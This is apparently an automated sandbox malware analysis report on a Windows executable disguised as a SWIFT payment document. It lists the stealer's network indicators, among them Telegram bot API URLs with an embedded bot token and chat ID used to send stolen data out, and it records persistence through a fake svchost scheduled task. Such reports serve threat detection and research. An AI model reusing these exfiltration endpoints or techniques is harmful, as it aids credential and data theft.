                                                            https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendDocument?chat_id=1689SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000335A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=SWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                                                		high
                                                                http://api.ipify.orgSWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000332E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ac.ecosia.org/autocomplete?q=b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                                                    		high
                                                                    https://search.yahoo.com?fr=crmas_sfpSWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                                                      		high
                                                                      https://ipapi.co4DpSWIFT_USD_165092.exe, 00000001.00000002.524320725.000000000287B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002ECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://t.me/typhon_shop.SWIFT_USD_165092.exe, 00000001.00000002.533583456.0000000003B06000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.662208925.0000000004012000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000332E000.00000004.00000800.00020000.00000000.sdmp, DotNetZip-cmmx3b12.tmp.1.dr, DotNetZip-dd5sgyyl.tmp.14.drfalse
                                                                        		high
                                                                        https://api.telegram.org4DpSWIFT_USD_165092.exe, 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://subf.domfagdfa6ffaffiffn.comd/objecsts.json?api_key=123RSWIFT_USD_165092.exe, svchost.exe.9.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://java.sun.comSWIFT_USD_165092.exe, 00000001.00000003.479687735.00000000061C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://t.me/typhon_shopsvchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://api.telegramSWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD8000.00000004.00000800.00020000.00000000.sdmptrue
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.codeplex.com/DotNetZipsvchost.exe, 0000000E.00000002.662208925.0000000004155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://t.me/typhoSWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://api.telegram.org4Dp(svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		low
                                                                              http://api.ipify.orgD8DpSWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000332E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://api.telegram.orgSWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drfalse
                                                                                    		high
                                                                                    https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=16890SWIFT_USD_165092.exe, 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000003341000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000003354000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      149.154.167.220
                                                                                      		api.telegram.orgUnited Kingdom
                                                                                      		62041TELEGRAMRUfalse
                                                                                      173.231.16.76
                                                                                      		api4.ipify.orgUnited States
                                                                                      		18450WEBNXUSfalse
                                                                                      172.67.69.226
                                                                                      		ipapi.coUnited States
                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                      Private

                                                                                      IP
                                                                                      192.168.2.1

                                                                                      General Information

                                                                                      Joe Sandbox Version:37.1.0 Beryl
                                                                                      Analysis ID:872897
                                                                                      Start date and time:2023-05-22 19:48:35 +02:00
                                                                                      Joe Sandbox Product:CloudBasic
                                                                                      Overall analysis duration:0h 13m 44s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                      Number of analysed new started processes analysed:60
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • HDC enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample file name:SWIFT_USD_165092.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@82/46@10/4
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HDC Information:Failed
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      • Number of executed functions: 102
                                                                                      • Number of non-executed functions: 3
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 20.189.173.20
                                                                                      • Excluded domains from analysis (whitelisted): login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      19:49:37Task SchedulerRun new task: Nafifas path: "C:\Users\user\AppData\Roaming\svchost\svchost.exe"
                                                                                      19:49:38API Interceptor65x Sleep call for process: SWIFT_USD_165092.exe modified
                                                                                      19:50:06API Interceptor169x Sleep call for process: svchost.exe modified
                                                                                      19:50:33API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      No context

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      ipapi.coNew_Badge_Guide.pdf.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                      • 104.26.8.44
                                                                                      Knowledge Base.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.26.9.44
                                                                                      Order_confirmation#28726.exeGet hashmaliciousTyphon LoggerBrowse
                                                                                      • 104.26.8.44
                                                                                      http://l-goot.co.jp/wf.phpGet hashmaliciousUnknownBrowse
                                                                                      • 104.26.9.44
                                                                                      f18itb3RpL.exeGet hashmaliciousUnknownBrowse
                                                                                      • 172.67.69.226
                                                                                      2eNUz808iz.exeGet hashmaliciousUnknownBrowse
                                                                                      • 104.26.8.44
                                                                                      http://finnewsafrica.comGet hashmaliciousUnknownBrowse
                                                                                      • 104.26.9.44
                                                                                      https://cx.surveysensum.com/d658up91Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.26.9.44
                                                                                      b9.exeGet hashmaliciousTyphon StealerBrowse
                                                                                      • 104.26.9.44
                                                                                      http://bankreference2g.highradius.com/CAM/displayGet hashmaliciousUnknownBrowse
                                                                                      • 172.67.69.226
                                                                                      http://redirect.viglink.comGet hashmaliciousUnknownBrowse
                                                                                      • 172.67.69.226
                                                                                      MSG834188.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.26.8.44
                                                                                      https://ms-online-arhaccounts.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 172.67.69.226
                                                                                      http://ms-online-arhaccounts.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.26.9.44
                                                                                      https://faas-nyc1-2ef2e6cc.doserverless.co/api/v1/web/fn-a0d6b988-2d39-4261-b1f3-196290d2513e/default/bra-des-clienteGet hashmaliciousUnknownBrowse
                                                                                      • 104.26.8.44
                                                                                      https://ms-online-kelvinsmith.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 172.67.69.226
                                                                                      https://l.facebook.com/l.php?u=https%3A%2F%2Fappealcenter-2331.netlify.app%2F&h=AT3Ms2KDIY05Q79l2SYsArydmTLyBT0uln9V1Cs6ZPyHu4p905WxKUKkb_IdzbuXG-ZZHEk6c28hhpvw3ygrzK4P2saF70qyTsqQYwwp9H8aQSmX0BV_ZR_STB77wWkTjVF5wjrYsy77jhQspcgG&__tn__=-UK-R&c%5B0%5D=AT0EBvj_y1hOVZU1FIUdZP5x0wyw0p6yE480nyuOWwoA5lp9dSvixurJskwJGqt1kmj7HOlFvP17Z8GGHLRSXLk1hR84BAUbcVi7HoXVXb5RlyVKWIedmqCq_6bYEhO_Z_fNLax1EyV66K0OzDVnvFUohd3cS9q143pA5WOXT8GHXPAUqwfK91bBfx4DSYjMwFnmifr9wrNdMnzZujy9_TpQoSRjGet hashmaliciousUnknownBrowse
                                                                                      • 104.26.8.44
                                                                                      https://llandudnopier-my.sharepoint.com/:o:/p/davebrown/Emkyeu1HZ3RKrW9Y-qBRl6QBCraZw-2g30UUpgAE68NPVw?e=5%3aG4LVWX&at=9Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 172.67.69.226
                                                                                      kZUUYkO5WE.exeGet hashmaliciousUnknownBrowse
                                                                                      • 104.26.8.44
                                                                                      kZUUYkO5WE.exeGet hashmaliciousUnknownBrowse
                                                                                      • 172.67.69.226
                                                                                      api4.ipify.orgPO-23000326.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 173.231.16.76
                                                                                      PI160256.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 104.237.62.211
                                                                                      REQUEST_FOR_QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 64.185.227.155
                                                                                      7S0NJKqEdz.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 104.237.62.211
                                                                                      Quote_609314275.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 173.231.16.76
                                                                                      sheet.htmlGet hashmaliciousUnknownBrowse
                                                                                      • 173.231.16.76
                                                                                      hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 104.237.62.211
                                                                                      Zapytanie ofertowe dla projektu w Lublinie 230522.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                      • 64.185.227.155
                                                                                      PO_4000101479.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 64.185.227.155
                                                                                      22-05-23_SENAL_TRACTORA_FIRMA_23-05-23.pdf.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                      • 173.231.16.76
                                                                                      hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 104.237.62.211
                                                                                      RGH098765567000.jarGet hashmaliciousAgentTeslaBrowse
                                                                                      • 64.185.227.155
                                                                                      PrCzsQAbCL.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                      • 64.185.227.155
                                                                                      DHL_Invoice.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                      • 104.237.62.211
                                                                                      amV53aYjN9.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                      • 173.231.16.76
                                                                                      omqt8iW57t.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 104.237.62.211
                                                                                      21324322.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 64.185.227.155
                                                                                      CAPs_INQUIRY_#2005023.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 173.231.16.76
                                                                                      rNiwZcZvUE.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                      • 104.237.62.211
                                                                                      DiscordGenv1.04.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                      • 173.231.16.76

                                                                                      ASNs

                                                                                      No context

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SWIFT_USD_165092_41ca84ad583e1d04fa532f4f3d7981cb08665bc_cc3e3e41_16e52724\Report.wer

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):1.3790170045786567
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:/9SO4BHBUZMXCaPtHD6P8K5hz6gL/u7smS274ItBz:EOmBUZMXCapAhL/u7smX4ItBz
                                                                                      MD5:01165E133A752C24E4AFADF433402D3E
                                                                                      SHA1:79DBEFEB55116DF4275B5DB0460319DB335813D8
                                                                                      SHA-256:72E616E5A0F2D47D0B480E14E273E9E10FC2F25AB97D344C738C44C8201D8009
                                                                                      SHA-512:9A89DFB3B6AB1552731E0CF830534A28D5B723B476C03C1044A026AB055E9A418D79C298BA1B12AFD7C8EC2037F62FFE638DC5125AF7ADD5B5BC2042E1F2E00B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.9.2.8.3.8.2.9.2.7.3.8.5.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.9.2.8.3.8.3.1.6.1.7.6.0.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.c.9.a.0.9.c.-.9.7.5.5.-.4.4.f.c.-.9.8.9.c.-.1.f.8.4.1.a.a.4.6.c.5.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.1.3.d.0.3.a.-.3.d.0.0.-.4.2.b.1.-.8.d.a.3.-.6.c.1.4.8.9.0.9.f.8.4.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.W.I.F.T._.U.S.D._.1.6.5.0.9.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.i.c.r.o.s.t.u.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.0.8.-.0.0.0.1.-.0.0.1.9.-.3.7.d.e.-.a.f.3.5.2.1.8.d.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.6.c.1.d.7.c.6.c.3.e.8.7.1.6.3.7.9.2.0.9.1.5.4.a.f.4.f.4.1.7.0.0.0.0.0.9.0.4.!.0.0.0.0.a.1.1.3.b.c.c.a.4.0.c.9.c.4.2.0.4.4.2.5.3.3.5.8.9.3.1.1.a.

                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER14F4.tmp.dmp

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 15 streams, Tue May 23 02:50:30 2023, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):464637
                                                                                      Entropy (8bit):3.2579077182450638
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:2s1Plp/By10uJIjd+pyLaphx02qUCgU/noVf/T9gIOgF553DyhdLO6J3Bfh2:2s1X40OZpYaF0Tj/mHT9RpDZ2dLp3Bf
                                                                                      MD5:8052B2F5CFE8F8A28C309C02B89CD49A
                                                                                      SHA1:D11270DC8D1A00E4427217EC093E237129941F51
                                                                                      SHA-256:898835595E822ED301CEABB47FDA5637B50CF5FB75319E5A95FB2BE56C6BAA29
                                                                                      SHA-512:24885A6F3042D070B411F8D8BF3DCE672DDD23A0D83B444F8211783546376DD99AB457FC4D01A494F1B87320B787D46B54B3C4DA96C1364E6BC16E5973CC2626
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:MDMP....... ........)ld........................\)..........<...T5.......8..............`.......8...........T...........Py...............5..........|7...................................................................U...........B.......8......GenuineIntelW...........T............)ld.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1BCB.tmp.WERInternalMetadata.xml

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):6418
                                                                                      Entropy (8bit):3.7199641915629384
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Rrl7r3GLNi6w6E7YZRSyCpra89b4UsfCUIm:RrlsNiV6IY/Sp4HfH
                                                                                      MD5:271D78D4407CD711A5C3670DB219DC3D
                                                                                      SHA1:A04C22C786841C30359348FEBF5067C045A985A0
                                                                                      SHA-256:2551F86A0F364E1C3BB99568340A2E9DC273AA75CAF9794473582D6FB508EBD8
                                                                                      SHA-512:6E20F90DBAFA30885B4C671F77829D7E988208DC32B74289C6642627AF30B2D94590F6DDE701D682F1351BB01D16D005540A490E235DEC1FC365BECC330B30D7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.4.0.<./.P.i.d.>.......

                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1C29.tmp.xml

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4772
                                                                                      Entropy (8bit):4.492856524796291
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwSD8zs7tJgtWI9vnWgc8sqYj/8fm8M4Jgm7fuF3+q8vum7fE0RUymGBed:uITfjQWgrsqYIJgiEKuiJRUymGcd
                                                                                      MD5:2FB224FE328DBC982CD0A7750206BB86
                                                                                      SHA1:1E01D2F1FF6C47F0E86C81A2267FCC34D4217474
                                                                                      SHA-256:E703996481DDB9940AD1013DC5C3B5E8F12D0EA51A3658B72F2D7513BF396EE8
                                                                                      SHA-512:27590CBF8FE418DB1150CC509C59324D5C421F711076477EFF3915A64F4BCA032D9D06DC22C0C7D14CE03F9432234C7FFF6224D00BC740400C41736ACB93553B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2052721" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\22-05-2023 22-41-22.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):77
                                                                                      Entropy (8bit):4.073958809208128
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:RGhz4dtedOv3RSAIdtNfKn:g4dteCRhIdtNKn
                                                                                      MD5:3982BDBCA5BE7103609955B31F2CD0B2
                                                                                      SHA1:C788B4A4C5DB64715C13AF6B876951793958AC3B
                                                                                      SHA-256:B1A814BB94D4AE163A103B0931039CCF72E5706B1122C6E32ED64F141C0AF160
                                                                                      SHA-512:8E7F3FD1E8D60578603D58C01A3B55A7B90ED1CB6350462741CCDB3C6CF37BCA45A55F83D63076663EFEC1B5E27E25621692CB270819EF03E5AD3812B48DD521
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:### explorer ### (22-05-2023 19:57:08)...### csrss ### (22-05-2023 21:40:22).

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\22-05-2023 22-47-44.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):77
                                                                                      Entropy (8bit):4.124800138008033
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:RGhz4dtexvQAIdtM5TMv:g4dtexvIdtM5Av
                                                                                      MD5:BDF6B6B7C7F946D5F3BB7A9E7CF5A68C
                                                                                      SHA1:840562587E34EF2A8B1A6637E1A30731D024F405
                                                                                      SHA-256:4EF4CB62A6EEB19472C638637F450D39F84EAF0C78C21349B272BB49CD42ABCE
                                                                                      SHA-512:BF399B13B7B2D17391C4F51A5A984DBAE48DA50CDCF9B81B6C9B8A676BE228F1085BE8F9C8D21C1EBE2B9080029C21664E1E82410F707C24C77DB211286A2597
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:### explorer ### (22-05-2023 19:56:39)...### csrss ### (22-05-2023 20:46:44).

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Installed Software.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2201
                                                                                      Entropy (8bit):5.181556325666345
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2ePf/3xJvI/+7NUf2OUaGAtWc6UxeH1wVcwfClwBcxuzPFpfPHTPPd4PHJAkPFpW:2ePf/3/vI/+5Uf2OUaGoWc6UxeVwVcwb
                                                                                      MD5:904843B16779606555C17E41A97EFF91
                                                                                      SHA1:43113602D2E3C367BBA596B18F39D2C9BD799A7E
                                                                                      SHA-256:9CB7BF4D0459C428B70C281DE0A90E150AEDF036DBB54C082F1E52DC5F6C3A43
                                                                                      SHA-512:5BD1F9EC37CD32D80162693322C6A3F1AC5FA0F3737853516571DE64A4A2C8C7E17104A0203FDB4B550F7E61659B6AFB66AECCF9D6516563094A65C73E88D15A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:1> Microsoft DCF MUI (English) 2016..2> Microsoft Office Professional Plus 2016..3> Microsoft OneNote MUI (English) 2016..4> Microsoft Office OSM MUI (English) 2016..5> Microsoft Office OSM UX MUI (English) 2016..6> Microsoft InfoPath MUI (English) 2016..7> Microsoft Access MUI (English) 2016..8> Microsoft Office Shared Setup Metadata MUI (English) 2016..9> Microsoft Excel MUI (English) 2016..10> Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2016..11> Microsoft Access Setup Metadata MUI (English) 2016..12> Microsoft PowerPoint MUI (English) 2016..13> Microsoft Publisher MUI (English) 2016..14> Microsoft Outlook MUI (English) 2016..15> Microsoft Office 64-bit Components 2016..16> Microsoft Office Shared 64-bit MUI (English) 2016..17> Microsoft Groove MUI (English) 2016..18> Microsoft Word MUI (English) 2016..19> Microsoft Skype for Business MUI (English) 2016..20> Microsoft Office Proofing (English) 2016..21> Microsoft Office Shared MUI (English) 2016..22> Microsoft Office

                                                                                      C:\Users\user\AppData\Local\Logs\22-05-2023\Process List.txt

                                                                                      Download File
